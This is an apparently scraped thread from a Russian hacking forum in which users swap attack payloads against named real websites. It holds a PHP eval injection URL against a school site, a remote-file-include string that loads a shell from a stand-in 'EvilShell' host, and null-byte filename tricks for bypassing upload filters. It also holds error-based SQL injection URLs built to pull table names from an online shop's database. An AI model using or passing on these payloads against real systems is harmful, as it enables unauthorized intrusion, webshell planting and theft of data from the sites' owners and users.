ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}

__________________
<? Raz0r.name — блог о web-безопасности

http://securityvulns.com/Odocument594.html
http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= Http://EvilShell
(с) alguidy[at]hotmail[.]com

1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
Content-Type: multipart/form-data

Если да то как это сделать? Правильно ли я это делаю
(этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
...
filename="thistest.php\x00.jpg"
...

второй вариант который пробывал:
...
filename="thistest.php\0.jpg"
...

2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
Content-Type: multipart/form-data

То как быть если часть названия файла до бек слеша ("\")
отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
Content-Type: multipart/form-data

Заранее спасибо за ответы

подскажите раскручиваемо??

http://www.wearhouse.ru/?page=item&id=125'

???

http://www.wearhouse.ru/?page=item&id=125+and+ascii(substring((select+tabl e_name+from+information_schema.tables+limit+0,1),1 ,1))>1

свеб агрится на юнион =)

Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(

Опыт + анализ

я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?

http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+

Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html